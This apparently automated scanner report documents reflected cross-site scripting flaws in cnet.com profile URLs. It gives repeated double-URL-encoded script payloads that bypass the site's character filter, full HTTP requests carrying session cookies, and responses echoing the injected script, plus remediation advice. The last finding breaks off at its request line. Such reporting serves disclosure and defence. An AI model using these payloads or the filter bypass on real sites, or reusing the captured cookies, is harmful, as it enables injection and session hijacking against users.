HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:06:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:06:15 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=986 Connection: Keep-Alive Content-Length: 31016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>nofinwayfff91<script>alert(1)</script>51f330b44a2's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63cac%253cscript%253ealert%25281%2529%253c%252fscript%253ea90a464add5 was submitted in the REST URL parameter 2. This input was echoed as 63cac<script>alert(1)</script>a90a464add5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/paulisdead63cac%253cscript%253ealert%25281%2529%253c%252fscript%253ea90a464add5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=963 Connection: Keep-Alive Content-Length: 31030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>paulisdead63cac<script>alert(1)</script>a90a464add5's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80eb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d36934a7d3 was submitted in the REST URL parameter 2. This input was echoed as 80eb6"><script>alert(1)</script>3d36934a7d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/paulisdead80eb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d36934a7d3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:37 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:37 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="paulisdead80eb6"><script>alert(1)</script>3d36934a7d3"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef33207010d2 was submitted in the REST URL parameter 2. This input was echoed as deee0"><script>alert(1)</script>f33207010d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/peterbutlerdeee0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef33207010d2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:31 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31150
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="peterbutlerdeee0"><script>alert(1)</script>f33207010d2"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1c7c%253cscript%253ealert%25281%2529%253c%252fscript%253efc0a807e27d was submitted in the REST URL parameter 2. This input was echoed as b1c7c<script>alert(1)</script>fc0a807e27d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/peterbutlerb1c7c%253cscript%253ealert%25281%2529%253c%252fscript%253efc0a807e27d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Length: 31062
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>peterbutlerb1c7c<script>alert(1)</script>fc0a807e27d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 240be%253cscript%253ealert%25281%2529%253c%252fscript%253e7ff8fd6c80d was submitted in the REST URL parameter 2. This input was echoed as 240be<script>alert(1)</script>7ff8fd6c80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rafe240be%253cscript%253ealert%25281%2529%253c%252fscript%253e7ff8fd6c80d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:39 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:39 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=987 Connection: Keep-Alive Content-Length: 30969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rafe240be<script>alert(1)</script>7ff8fd6c80d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9368331407d was submitted in the REST URL parameter 2. This input was echoed as a65a0"><script>alert(1)</script>9368331407d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rafea65a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9368331407d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:38 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:38 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=998 Connection: Keep-Alive Content-Length: 30993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rafea65a0"><script>alert(1)</script>9368331407d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba9bf%253cscript%253ealert%25281%2529%253c%252fscript%253e34953908a02 was submitted in the REST URL parameter 2. This input was echoed as ba9bf<script>alert(1)</script>34953908a02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/raygun01ba9bf%253cscript%253ealert%25281%2529%253c%252fscript%253e34953908a02/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:05 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:05 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=944 Connection: Keep-Alive Content-Length: 31052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>raygun01ba9bf<script>alert(1)</script>34953908a02's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abe22%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1f866ca59f was submitted in the REST URL parameter 2. This input was echoed as abe22"><script>alert(1)</script>1f866ca59f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/raygun01abe22%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1f866ca59f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:03 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:03 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31045
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="raygun01abe22"><script>alert(1)</script>1f866ca59f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afed3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94da697379d was submitted in the REST URL parameter 2. This input was echoed as afed3"><script>alert(1)</script>94da697379d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhapsodyartistafed3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e94da697379d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:11:14 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:11:14 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=961 Connection: Keep-Alive Content-Length: 31182
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="rhapsodyartistafed3"><script>alert(1)</script>94da697379d"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ce1f%253cscript%253ealert%25281%2529%253c%252fscript%253e7331cad2a85 was submitted in the REST URL parameter 2. This input was echoed as 7ce1f<script>alert(1)</script>7331cad2a85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/rhapsodyartist7ce1f%253cscript%253ealert%25281%2529%253c%252fscript%253e7331cad2a85/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:11:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:11:16 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=980 Connection: Keep-Alive Content-Length: 31188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>rhapsodyartist7ce1f<script>alert(1)</script>7331cad2a85's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16bb6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60c21ad9 was submitted in the REST URL parameter 2. This input was echoed as 16bb6"><script>alert(1)</script>b60c21ad9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
